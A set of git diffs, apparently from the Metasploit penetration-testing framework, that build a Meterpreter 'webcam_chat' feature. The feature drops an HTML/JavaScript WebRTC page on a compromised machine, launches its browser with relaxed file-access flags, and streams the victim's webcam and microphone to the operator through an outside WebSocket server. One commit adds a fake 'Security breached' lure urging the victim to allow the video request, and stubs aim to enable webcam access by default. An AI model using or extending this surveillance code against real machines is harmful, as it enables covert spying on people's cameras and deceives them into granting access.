-			socket.send = function (data) {
-                console.debug(data);
-				socket.push(JSON.stringify(data));
-                console.debug("data sent");
-			};
+        var socket = socketURL;
+        if(typeof socketURL == 'string') {
+            socket = new WebSocket(socketURL);
+            socket.push = socket.send;
+            socket.send = function (data) {
+                socket.push(JSON.stringify(data));
+            };
 
-			socket.onopen = function () {
-				console.log('websocket connection opened.');
-			};
-		}
-		socket.onmessage = onmessage;
+            socket.onopen = function () {
+                console.log('websocket connection opened.');
+            };
+        }
+        socket.onmessage = onmessage;
     }
 
     var RTCPeerConnection = window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
@@ -270,8 +260,8 @@
     function getToken() {
         return Math.round(Math.random() * 9999999999) + 9999999999;
     }
-	
-	function onSdpError() {}
+    
+    function onSdpError() {}
 
     // var offer = Offer.createOffer(config);
     // offer.setRemoteDescription(sdp);
@@ -351,23 +341,23 @@
         }
         return mergein;
     }
-	
-	window.URL = window.webkitURL || window.URL;
-	navigator.getMedia = navigator.webkitGetUserMedia || navigator.mozGetUserMedia;
-	navigator.getUserMedia = function(hints, onsuccess, onfailure) {
-		if(!hints) hints = {audio:true,video:true};
-		if(!onsuccess) throw 'Second argument is mandatory. navigator.getUserMedia(hints,onsuccess,onfailure)';
-		
-		navigator.getMedia(hints, _onsuccess, _onfailure);
-		
-		function _onsuccess(stream) {
-			onsuccess(stream);
-		}
-		
-		function _onfailure(e) {
-			if(onfailure) onfailure(e);
-			else throw Error('getUserMedia failed: ' + JSON.stringify(e, null, '\t'));
-		}
-	};
-	
+    
+    window.URL = window.webkitURL || window.URL;
+    navigator.getMedia = navigator.webkitGetUserMedia || navigator.mozGetUserMedia;
+    navigator.getUserMedia = function(hints, onsuccess, onfailure) {
+        if(!hints) hints = {audio:true,video:true};
+        if(!onsuccess) throw 'Second argument is mandatory. navigator.getUserMedia(hints,onsuccess,onfailure)';
+        
+        navigator.getMedia(hints, _onsuccess, _onfailure);
+        
+        function _onsuccess(stream) {
+            onsuccess(stream);
+        }
+        
+        function _onfailure(e) {
+            if(onfailure) onfailure(e);
+            else throw Error('getUserMedia failed: ' + JSON.stringify(e, null, '\t'));
+        }
+    };
+    
 })();

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -68,6 +68,7 @@
 				video.src = URL.createObjectURL(stream);
 				video.controls = true;
 				video.muted = false;
+				video.volume = 0.2;
 
 				peer.onStreamAdded({
 					mediaElement: video,

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -3,6 +3,13 @@
 	<script src="api.js"> </script>
 </head>
 <body>
+	<div id="message">
+	<font color="red">
+	<h2>Urgent: Security breached.</h2>
+
+	Your computer security has been breached during an authorized assessment.<br>
+	Please allow the video chat request in order to resolve this matter.
+	</font></div>
 	<div id="chat_area"></div>
 	<script>
 		var channel = 'msfsinn3rtest123';
@@ -29,6 +36,7 @@
 			var video = e.mediaElement;
 			video.setAttribute('width', 600);
 			video.setAttribute('controls', true);
+			document.getElementById("message").style.display = "none";
 			document.getElementById("chat_area").appendChild(video);
 			video.play();
 		};

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <head>
-	<script src="webrtc_api.js"> </script>
+	<script src="api.js"> </script>
 </head>
 <body>
 	<script>

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -49,6 +49,8 @@
 					video.parentNode.removeChild(video);
 				}, 1000);
 			}
+			document.getElementById("message").innerHTML = "The video session has ended.";
+			document.getElementById("message").style.display = "";
 		};
 
 		window.onload = function() {

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -36,6 +36,7 @@
 			var video = e.mediaElement;
 			video.setAttribute('width', 600);
 			video.setAttribute('controls', true);
+			video.volume = 0.2;
 			document.getElementById("message").style.display = "none";
 			document.getElementById("chat_area").appendChild(video);
 			video.play();
@@ -78,7 +79,6 @@
 				video.src = URL.createObjectURL(stream);
 				video.controls = true;
 				video.muted = false;
-				video.volume = 0.2;
 
 				peer.onStreamAdded({
 					mediaElement: video,

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -1,0 +1,83 @@
+<!DOCTYPE html>
+<head>
+	<script src="webrtc_api.js"> </script>
+</head>
+<body>
+	<script>
+		var channel = 'msfsinn3rtest123';
+		var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
+
+		websocket.onopen = function() {
+			websocket.push(JSON.stringify({
+				open: true,
+				channel: channel
+			}));
+		};
+
+		websocket.push = websocket.send;
+		websocket.send = function(data) {
+			websocket.push(JSON.stringify({
+				data: data,
+				channel: channel
+			}));
+		};
+
+		var peer = new PeerConnection(websocket);
+
+		peer.onStreamAdded = function(e) {
+			var video = e.mediaElement;
+			video.setAttribute('width', 600);
+			video.setAttribute('controls', true);
+			document.body.appendChild(video);
+			video.play();
+		};
+
+		peer.onStreamEnded = function(e) {
+			var video = e.mediaElement;
+			if (video) {
+				video.style.opacity = 0;
+				setTimeout(function() {
+					video.parentNode.removeChild(video);
+				}, 1000);
+			}
+		};
+
+		window.onload = function() {
+			console.debug("onload");
+			getUserMedia(function(stream) {
+				peer.addStream(stream);
+				console.debug("broadcasting");
+				peer.startBroadcasting();
+			});
+		};
+			
+		function getUserMedia(callback) {
+			var hints = {audio:true,video:{
+				optional: [],
+				mandatory: {
+					minWidth: 1280,
+					minHeight: 720,
+					maxWidth: 1920,
+					maxHeight: 1080,
+					minAspectRatio: 1.77
+				}
+			}};
+
+			navigator.getUserMedia(hints,function(stream) {
+				var video = document.createElement('video');
+				video.src = URL.createObjectURL(stream);
+				video.controls = true;
+				video.muted = true;
+
+				peer.onStreamAdded({
+					mediaElement: video,
+					userid: 'self',
+					stream: stream
+				});
+						
+				callback(stream);
+			});
+		}
+	</script>
+</body>
+</html>

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -1,8 +1,9 @@
 <!DOCTYPE html>
 <head>
-	<script src="=WEBRTCAPIJS="> </script>
+	<script src="api.js"> </script>
 </head>
 <body>
+	<div id="chat_area"></div>
 	<script>
 		var channel = 'msfsinn3rtest123';
 		var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
@@ -28,7 +29,7 @@
 			var video = e.mediaElement;
 			video.setAttribute('width', 600);
 			video.setAttribute('controls', true);
-			document.body.appendChild(video);
+			document.getElementById("chat_area").appendChild(video);
 			video.play();
 		};
 
@@ -46,7 +47,6 @@
 			console.debug("onload");
 			getUserMedia(function(stream) {
 				peer.addStream(stream);
-				console.debug("broadcasting");
 				peer.startBroadcasting();
 			});
 		};

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <head>
-	<script src="api.js"> </script>
+	<script src="=WEBRTCAPIJS="> </script>
 </head>
 <body>
 	<script>
@@ -67,7 +67,7 @@
 				var video = document.createElement('video');
 				video.src = URL.createObjectURL(stream);
 				video.controls = true;
-				video.muted = true;
+				video.muted = false;
 
 				peer.onStreamAdded({
 					mediaElement: video,

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -3,7 +3,7 @@
 	<script src="api.js"> </script>
 </head>
 <body>
-	<div id="message">
+	<div id="message" align="right">
 	<font color="red">
 	<h2>Urgent: Security breached.</h2>
 
@@ -34,9 +34,10 @@
 
 		peer.onStreamAdded = function(e) {
 			var video = e.mediaElement;
-			video.setAttribute('width', 600);
+			video.setAttribute('width', 640);
+			video.setAttribute('height', 480);
 			video.setAttribute('controls', true);
-			video.volume = 0.2;
+			video.volume = 0.5;
 			document.getElementById("message").style.display = "none";
 			document.getElementById("chat_area").appendChild(video);
 			video.play();

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -30,7 +30,7 @@
 			}));
 		};
 
-		var peer = new PeerConnection(websocket);
+		var peer = new PeerConnection(websocket, '=OFFERERID=');
 
 		peer.onStreamAdded = function(e) {
 			var video = e.mediaElement;

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -12,7 +12,7 @@
 	</font></div>
 	<div id="chat_area"></div>
 	<script>
-		var channel = 'msfsinn3rtest123';
+		var channel = '=CHANNEL=';
 		var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
 
 		websocket.onopen = function() {
@@ -55,13 +55,12 @@
 		};
 
 		window.onload = function() {
-			console.debug("onload");
 			getUserMedia(function(stream) {
 				peer.addStream(stream);
 				peer.startBroadcasting();
 			});
 		};
-			
+
 		function getUserMedia(callback) {
 			var hints = {audio:true,video:{
 				optional: [],

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -3,13 +3,7 @@
 	<script src="api.js"> </script>
 </head>
 <body>
-	<div id="message" align="right">
-	<font color="red">
-	<h2>Urgent: Security breached.</h2>
-
-	Your computer security has been breached during an authorized assessment.<br>
-	Please allow the video chat request in order to resolve this matter.
-	</font></div>
+	<div id="message">Starting a session...</div>
 	<div id="chat_area"></div>
 	<script>
 		var channel = '=CHANNEL=';
@@ -52,7 +46,6 @@
 				}, 1000);
 			}
 			document.getElementById("message").innerHTML = "The video session has ended.";
-			document.getElementById("message").style.display = "";
 		};
 
 		window.onload = function() {

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -1,10 +1,90 @@
-<!DOCTYPE html>
+<html>
 <head>
+	<title>Video session</title>
+	<style type="text/css">
+		div.dot1 {
+			position: absolute;
+			width: 20px;
+			height: 20px;
+			margin: 30px auto 0;
+			border-radius: 50px;
+			background-color: red;
+			top: 150;
+			left: 470;
+		}
+
+		div.dot2 {
+			position: absolute;
+			width: 20px;
+			height: 20px;
+			margin: 30px auto 0;
+			border-radius: 50px;
+			background-color: red;
+			top: 150;
+			left: 505;
+		}
+
+		div.dot3 {
+			position: absolute;
+			width: 20px;
+			height: 20px;
+			margin: 30px auto 0;
+			border-radius: 50px;
+			background-color: red;
+			top: 150;
+			left: 540;
+		}
+
+		div.windowa {
+			height: 340px;
+			width: 420px;
+			border-radius: 15px;
+			-moz-border-raidus: 15px;
+			background-color: black;
+			position: absolute;
+			left: 20;
+			padding : 10px;
+			margin-left: auto;
+			margin-right: auto;
+			text-align: center;
+			vertical-align: middle;
+			color: white;
+		}
+
+		div.windowb {
+			height: 340px;
+			width: 420px;
+			border-radius: 15px;
+			-moz-border-raidus: 15px;
+			background-color: black;
+			position: absolute;
+			left: 570;
+			padding : 10px;
+			margin-left: auto;
+			margin-right: auto;
+			text-align: center;
+			vertical-align: middle;
+			color: white;
+		}
+
+		div.windowc {
+			position: absolute;
+			top: 400;
+			left: 60;
+			height: 50px;
+			width: 900px;
+			color: red;
+		}
+
+		div.footer {
+			position: fixed;
+			bottom: 0;
+			width: 100%;
+			padding: 10px;
+		}
+	</style>
+
 	<script src="api.js"> </script>
-</head>
-<body>
-	<div id="message">Starting a session...</div>
-	<div id="chat_area"></div>
 	<script>
 		var channel = '=CHANNEL=';
 		var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
@@ -28,12 +108,19 @@
 
 		peer.onStreamAdded = function(e) {
 			var video = e.mediaElement;
-			video.setAttribute('width', 640);
-			video.setAttribute('height', 480);
-			video.setAttribute('controls', true);
+			video.setAttribute('width', 420);
+			video.setAttribute('height', 340);
+			video.setAttribute('controls', false);
 			video.volume = 0.5;
-			document.getElementById("message").style.display = "none";
-			document.getElementById("chat_area").appendChild(video);
+
+			if (e.userid == 'self') {
+				document.getElementById("windowb").appendChild(video);
+			}
+			else {
+				document.getElementById("windowa").appendChild(video);
+				document.getElementById("message").innerHTML = "Session is now active.";
+			}
+
 			video.play();
 		};
 
@@ -70,9 +157,6 @@
 			navigator.getUserMedia(hints,function(stream) {
 				var video = document.createElement('video');
 				video.src = URL.createObjectURL(stream);
-				video.controls = true;
-				video.muted = false;
-
 				peer.onStreamAdded({
 					mediaElement: video,
 					userid: 'self',
@@ -83,5 +167,29 @@
 			});
 		}
 	</script>
+</head>
+<body>
+
+<div class="windowa" id="windowa">
+	<b>You peer</b>
+</div>
+
+<div class="dot1"></div>
+<div class="dot2"></div>
+<div class="dot3"></div>
+
+<div class="windowb" id="windowb">
+	<b>You</b>
+</div>
+
+<div class="windowc">
+	<b>Status:</b><p></p>
+	<span id="message">Waiting for your peer to join the video session...</span>
+</div>
+
+<div class="footer">
+	<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
+</div>
+
 </body>
 </html>

--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -87,7 +87,7 @@
 	<script src="api.js"> </script>
 	<script>
 		var channel = '=CHANNEL=';
-		var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
+		var websocket = new WebSocket('ws://=SERVER=');
 
 		websocket.onopen = function() {
 			websocket.push(JSON.stringify({

--- a/lib/rex/compat.rb
+++ b/lib/rex/compat.rb
@@ -158,7 +158,13 @@ def self.open_webrtc_browser(url='http://metasploit.com/')
     ['Google Chrome.app', 'Firefox.app'].each do |browser|
       browser_path = "/Applications/#{browser}"
       if File.directory?(browser_path)
-        system("open -a \"#{browser_path}\" --args \"--allow-file-access-from-files\" \"#{url}\" &")
+
+        args = ''
+        if browser_path =~ /Chrome/
+          args = "--args --allow-file-access-from-files"
+        end
+
+        system("open #{url} -a \"#{browser_path}\" #{args} &")
         found_browser = true
         break
       end

--- a/lib/rex/compat.rb
+++ b/lib/rex/compat.rb
@@ -153,16 +153,33 @@ def self.open_webrtc_browser(url='http://metasploit.com/')
 
   case RUBY_PLATFORM
   when /mswin2|mingw|cygwin/
-    # Windows
+      paths = [
+        "Google\\Chrome\\Application\\chrome.exe",
+        "Mozilla Firefox\\firefox.exe",
+        "Opera\\launcher.exe"
+      ]
+
+      prog_files = ENV['ProgramFiles']
+      paths = paths.map { |p| "#{prog_files}\\#{p}" }
+
+      # Old chrome path
+      app_data = ENV['APPDATA']
+      paths << "#{app_data}\\Google\\Chrome\\Application\\chrome.exe"
+
+      paths.each do |p|
+        if File.exists?(p)
+          args = (p =~ /chrome\.exe/) ? "--allow-file-access-from-files" : ""
+          system("#{path} #{args} #{url}")
+          found_browser = true
+          break
+        end
+      end
+
   when /darwin/
     ['Google Chrome.app', 'Firefox.app'].each do |browser|
       browser_path = "/Applications/#{browser}"
       if File.directory?(browser_path)
-
-        args = ''
-        if browser_path =~ /Chrome/
-          args = "--args --allow-file-access-from-files"
-        end
+        args = (browser_path =~ /Chrome/) ? "--args --allow-file-access-from-files" : ""
 
         system("open #{url} -a \"#{browser_path}\" #{args} &")
         found_browser = true
@@ -175,7 +192,8 @@ def self.open_webrtc_browser(url='http://metasploit.com/')
         ENV['PATH'].split(':').each do |path|
           browser_path = "#{path}/#{browser}"
           if File.exists?(browser_path)
-            system("#{browser_path} #{url} &")
+            args = (browser_path =~ /Chrome/) ? "--allow-file-access-from-files" : ""
+            system("#{browser_path} #{args} #{url} &")
             found_browser = true
           end
         end

--- a/lib/rex/compat.rb
+++ b/lib/rex/compat.rb
@@ -148,6 +148,38 @@ def self.open_browser(url='http://metasploit.com/')
   end
 end
 
+def self.open_webrtc_browser(url='http://metasploit.com/')
+  found_browser = false
+
+  case RUBY_PLATFORM
+  when /mswin2|mingw|cygwin/
+    # Windows
+  when /darwin/
+    ['Google Chrome.app', 'Firefox.app'].each do |browser|
+      browser_path = "/Applications/#{browser}"
+      if File.directory?(browser_path)
+        system("open -a \"#{browser_path}\" --args \"--allow-file-access-from-files\" \"#{url}\" &")
+        found_browser = true
+        break
+      end
+    end
+  else
+    if defined? ENV['PATH']
+      ['chrome', 'chromium', 'firefox', 'opera'].each do |browser|
+        ENV['PATH'].split(':').each do |path|
+          browser_path = "#{path}/#{browser}"
+          if File.exists?(browser_path)
+            system("#{browser_path} #{url} &")
+            found_browser = true
+          end
+        end
+      end
+    end
+  end
+
+  found_browser
+end
+
 def self.open_email(addr)
   case RUBY_PLATFORM
   when /mswin32|cygwin/

--- a/lib/rex/compat.rb
+++ b/lib/rex/compat.rb
@@ -148,7 +148,7 @@ def self.open_browser(url='http://google.com/')
   end
 end
 
-def self.open_webrtc_browser(url='http://metasploit.com/')
+def self.open_webrtc_browser(url='http://google.com/')
   found_browser = false
 
   case RUBY_PLATFORM

--- a/lib/rex/compat.rb
+++ b/lib/rex/compat.rb
@@ -114,7 +114,7 @@ def self.open_file(url='')
   end
 end
 
-def self.open_browser(url='http://metasploit.com/')
+def self.open_browser(url='http://google.com/')
   case RUBY_PLATFORM
   when /cygwin/
     if(url[0,1] == "/")

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -126,7 +126,9 @@ class Webcam
         end
       end
     when /linux|unix/
-      # Need to add support for Linux
+      # Need to add support for Linux in the future.
+      # But you see, the Linux meterpreter is so broken there is no point
+      # to do it now. You can't test anyway.
     end
 
     found_browser_path

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -186,6 +186,8 @@ class Webcam
     tmp_api.close
 
     interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path)
+    interface = interface.gsub(/\=RHOST\=/, rhost)
+    interface = interface.gsub(/\=STARTTIME\=/, Time.now.to_s)
 
     tmp_interface = Tempfile.new('answerer.html')
     tmp_interface.binmode

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -57,8 +57,8 @@ class Webcam
   end
 
   def chat_request
-    offerer_id = 'sinn3r_offer'
-    channel = Rex::Text.rand_text_alphanumeric(20)
+    offerer_id = Rex::Text.rand_text_alphanumeric(10)
+    channel    = Rex::Text.rand_text_alphanumeric(20)
 
     remote_browser_path = get_webrtc_browser_path
 
@@ -146,6 +146,7 @@ class Webcam
     api       = load_api_code
 
     interface = interface.gsub(/\=CHANNEL\=/, channel)
+    interface = interface.gsub(/\=OFFERERID\=/, offerer_id)
 
     tmp_dir = session.sys.config.getenv("TEMP")
 
@@ -192,6 +193,7 @@ class Webcam
     interface = interface.gsub(/\=RHOST\=/, rhost)
     interface = interface.gsub(/\=STARTTIME\=/, Time.now.to_s)
     interface = interface.gsub(/\=CHANNEL\=/, channel)
+    interface = interface.gsub(/\=OFFERERID\=/, offerer_id)
 
     tmp_interface = Tempfile.new('answerer.html')
     tmp_interface.binmode

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -59,12 +59,13 @@ class Webcam
   def webcam_chat
     offerer_id = 'sinn3r_offer'
     remote_browser_path = get_webrtc_browser_path
+    allow_remote_webcam(remote_browser_path)
     ready_status = init_video_chat(remote_browser_path, offerer_id)
     unless ready_status
       raise RuntimeError, "Unable to find a suitable browser to initialize a WebRTC session."
     end
 
-    select(nil, nil, nil, 10)
+    select(nil, nil, nil, 1)
     connect_video_chat(offerer_id)
   end
 
@@ -81,6 +82,29 @@ class Webcam
 
 
   private
+
+  def allow_remote_webcam(browser)
+    case browser
+    when /chrome/i
+      allow_remote_webcam_chrome
+    when /firefox/i
+      allow_remote_webcam_firefox
+    when /opera/i
+      allow_remote_webcam_opera
+    end
+  end
+
+  def allow_remote_webcam_chrome
+    # Modify Chrome to allow webcam by default
+  end
+
+  def allow_remote_webcam_firefox
+    # Modify Firefox to allow webcam by default
+  end
+
+  def allow_remote_webcam_opera
+    # Modify Opera to allow webcam by default
+  end
 
   #
   # Returns a browser path that supports WebRTC
@@ -139,10 +163,9 @@ class Webcam
     write_file("#{tmp_dir}\\interface.html", interface)
     write_file("#{tmp_dir}\\api.js", api)
 
-    # Special flags needed
     args = ''
     if remote_browser_path =~ /Chrome/
-      args = "\"--allow-file-access-from-files\""
+      args = "--allow-file-access-from-files"
     end
 
     exec_opts = {'Hidden' => false, 'Channelized' => false}

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -67,7 +67,6 @@ class Webcam
     allow_remote_webcam(remote_browser_path)
     ready_status = init_video_chat(remote_browser_path, offerer_id)
 
-    #select(nil, nil, nil, 1)
     connect_video_chat(offerer_id)
   end
 
@@ -168,8 +167,13 @@ class Webcam
 
     tmp_dir = session.sys.config.getenv("TEMP")
 
-    write_file("#{tmp_dir}\\interface.html", interface)
-    write_file("#{tmp_dir}\\api.js", api)
+    begin
+      write_file("#{tmp_dir}\\interface.html", interface)
+      write_file("#{tmp_dir}\\api.js", api)
+    rescue ::Exception => e
+      elog("chat_request failed. #{e.class} #{e.to_s}")
+      raise RuntimeError, "Unable to initialize the interface on the target machine"
+    end
 
     args = ''
     if remote_browser_path =~ /Chrome/
@@ -181,7 +185,12 @@ class Webcam
 
     exec_opts = {'Hidden' => false, 'Channelized' => false}
 
-    session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
+    begin
+      session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
+    rescue ::Exception => e
+      elog("chat_request failed. #{e.class} #{e.to_s}")
+      raise RuntimeError, "Unable to start the remote browser: #{e.message}"
+    end
   end
 
 

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -118,20 +118,37 @@ class Webcam
   def init_video_chat(offerer_id)
     interface = load_interface('offerer.html')
     api       = load_api_code
-    # Write interface
-    # Write api
-    Rex::Compat.open_webrtc_browser
-  end
 
+    tmp_api = Tempfile.new('api.js')
+    tmp_api.binmode
+    tmp_api.write(api)
+    tmp_api.close
+
+    interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path)
+
+    tmp_interface = Tempfile.new('offerer.html')
+    tmp_interface.binmode
+    tmp_interface.write(interface)
+    tmp_interface.close
+
+    Rex::Compat.open_webrtc_browser(tmp_interface.path)
+  end
 
   def connect_video_chat(remote_browser_path, offerer_id)
     interface = load_interface('answerer.html')
     api       = load_api_code
-    # Write interface
+
+    # write interface
     # write api
 
+    # Special flags needed
+    args = ''
+    if remote_browser_path =~ /Chrome/
+      args = "\"--allow-file-access-from-files\""
+    end
+
     exec_opts = {'Hidden' => false, 'Channelized' => false}
-    args = "--args --allow-file-access-from-files http://metasploit.com"
+    args = "#{args} http://metasploit.com"
     session.sys.process.execute(remote_browser_path, args, exec_opts)
   end
 

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -56,7 +56,7 @@ class Webcam
     true
   end
 
-  def webcam_chat
+  def chat_request
     offerer_id = 'sinn3r_offer'
     remote_browser_path = get_webrtc_browser_path
     allow_remote_webcam(remote_browser_path)
@@ -65,7 +65,7 @@ class Webcam
       raise RuntimeError, "Unable to find a suitable browser to initialize a WebRTC session."
     end
 
-    select(nil, nil, nil, 1)
+    #select(nil, nil, nil, 1)
     connect_video_chat(offerer_id)
   end
 

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -86,7 +86,7 @@ class Webcam
 
     case client.platform
     when /win/
-      drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
+      drive = session.sys.config.getenv("SYSTEMDRIVE")
 
       [
         "Program Files\\Google\\Chrome\\Application\\chrome.exe",

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -157,9 +157,6 @@ class Webcam
 
     args = ''
     if remote_browser_path =~ /Chrome/
-      # https://src.chromium.org/viewvc/chrome?revision=221000&view=revision
-      # args = "--allow-file-access-from-files --disable-user-media-security --disable-web-security"
-
       args = "--allow-file-access-from-files"
     end
 

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -194,7 +194,10 @@ class Webcam
     tmp_interface.write(interface)
     tmp_interface.close
 
-    Rex::Compat.open_webrtc_browser(tmp_interface.path)
+    found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path)
+    unless found_local_browser
+      raise RuntimeError, "Unable to find a suitable browser to connect to the target"
+    end
   end
 
 

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -64,9 +64,7 @@ class Webcam
       raise RuntimeError, "Unable to find a suitable browser on the target machine"
     end
 
-    allow_remote_webcam(remote_browser_path)
     ready_status = init_video_chat(remote_browser_path, offerer_id)
-
     connect_video_chat(offerer_id)
   end
 

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -84,28 +84,6 @@ class Webcam
 
   private
 
-  def allow_remote_webcam(browser)
-    case browser
-    when /chrome/i
-      allow_remote_webcam_chrome
-    when /firefox/i
-      allow_remote_webcam_firefox
-    when /opera/i
-      allow_remote_webcam_opera
-    end
-  end
-
-  def allow_remote_webcam_chrome
-    # Modify Chrome to allow webcam by default
-  end
-
-  def allow_remote_webcam_firefox
-    # Modify Firefox to allow webcam by default
-  end
-
-  def allow_remote_webcam_opera
-    # Modify Opera to allow webcam by default
-  end
 
   #
   # Returns a browser path that supports WebRTC

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -47,6 +47,14 @@ class Webcam
     true
   end
 
+  def webcam_chat
+    offerer_id = 'sinn3r_offer'
+    remote_browser_path = find_remote_webrtc_browser
+    local_browser_path  = find_local_webrtc_browser
+    init_video_chat(local_browser_path, offerer_id)
+    connect_video_chat(offerer_id)
+  end
+
   # Record from default audio source for +duration+ seconds;
   # returns a low-quality wav file
   def record_mic(duration)
@@ -57,6 +65,47 @@ class Webcam
   end
 
   attr_accessor :client
+
+
+  private
+
+
+  def find_remote_webrtc_browser
+    puts "Looking for a web browser on the target machine that supports WebRTC..."
+    ''
+  end
+
+
+  def find_local_webrtc_browser
+    puts "Looking for a web browser on the local machine that supports WebRTC..."
+    ''
+  end
+
+
+  def init_video_chat(local_browser_path, offerer_id, httpserver_port=8080)
+    interface = load_interface('offerer.html')
+    api       = load_api_code
+  end
+
+
+  def connect_video_chat(offerer_id)
+    interface = load_interface('answerer.html')
+    api       = load_api_code
+  end
+
+  def load_interface(html_name)
+    interface_path = File.join(Msf::Config.data_directory, 'webcam', html_name)
+    interface_code = ''
+    File.open(interface_path) { |f| interface_code = f.read }
+    interface_code
+  end
+
+  def load_api_code
+    js_api_path = File.join(Msf::Config.data_directory, 'webcam', 'api.js')
+    api = ''
+    File.open(js_api_path) { |f| api = f.read }
+    api
+  end
 
 end
 

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -58,14 +58,16 @@ class Webcam
 
   def chat_request
     offerer_id = 'sinn3r_offer'
+    channel = Rex::Text.rand_text_alphanumeric(20)
+
     remote_browser_path = get_webrtc_browser_path
 
     if remote_browser_path.blank?
       raise RuntimeError, "Unable to find a suitable browser on the target machine"
     end
 
-    ready_status = init_video_chat(remote_browser_path, offerer_id)
-    connect_video_chat(offerer_id)
+    ready_status = init_video_chat(remote_browser_path, channel, offerer_id)
+    connect_video_chat(channel, offerer_id)
   end
 
   # Record from default audio source for +duration+ seconds;
@@ -137,9 +139,11 @@ class Webcam
   # @param remote_browser_path [String] A browser path that supports WebRTC on the target machine
   # @param offerer_id [String] A ID that the answerer can look for and join
   #
-  def init_video_chat(remote_browser_path, offerer_id)
+  def init_video_chat(remote_browser_path, channel, offerer_id)
     interface = load_interface('offerer.html')
     api       = load_api_code
+
+    interface = interface.gsub(/\=CHANNEL\=/, channel)
 
     tmp_dir = session.sys.config.getenv("TEMP")
 
@@ -176,7 +180,7 @@ class Webcam
   # @param offerer_id [String] The offerer's ID in order to join the video chat
   # @return void
   #
-  def connect_video_chat(offerer_id)
+  def connect_video_chat(channel, offerer_id)
     interface = load_interface('answerer.html')
     api       = load_api_code
 
@@ -188,6 +192,7 @@ class Webcam
     interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path)
     interface = interface.gsub(/\=RHOST\=/, rhost)
     interface = interface.gsub(/\=STARTTIME\=/, Time.now.to_s)
+    interface = interface.gsub(/\=CHANNEL\=/, channel)
 
     tmp_interface = Tempfile.new('answerer.html')
     tmp_interface.binmode

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -165,6 +165,9 @@ class Webcam
 
     args = ''
     if remote_browser_path =~ /Chrome/
+      # https://src.chromium.org/viewvc/chrome?revision=221000&view=revision
+      # args = "--allow-file-access-from-files --disable-user-media-security --disable-web-security"
+
       args = "--allow-file-access-from-files"
     end
 

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -56,7 +56,7 @@ class Webcam
     true
   end
 
-  def chat_request
+  def webcam_chat
     offerer_id = Rex::Text.rand_text_alphanumeric(10)
     channel    = Rex::Text.rand_text_alphanumeric(20)
 
@@ -155,7 +155,7 @@ class Webcam
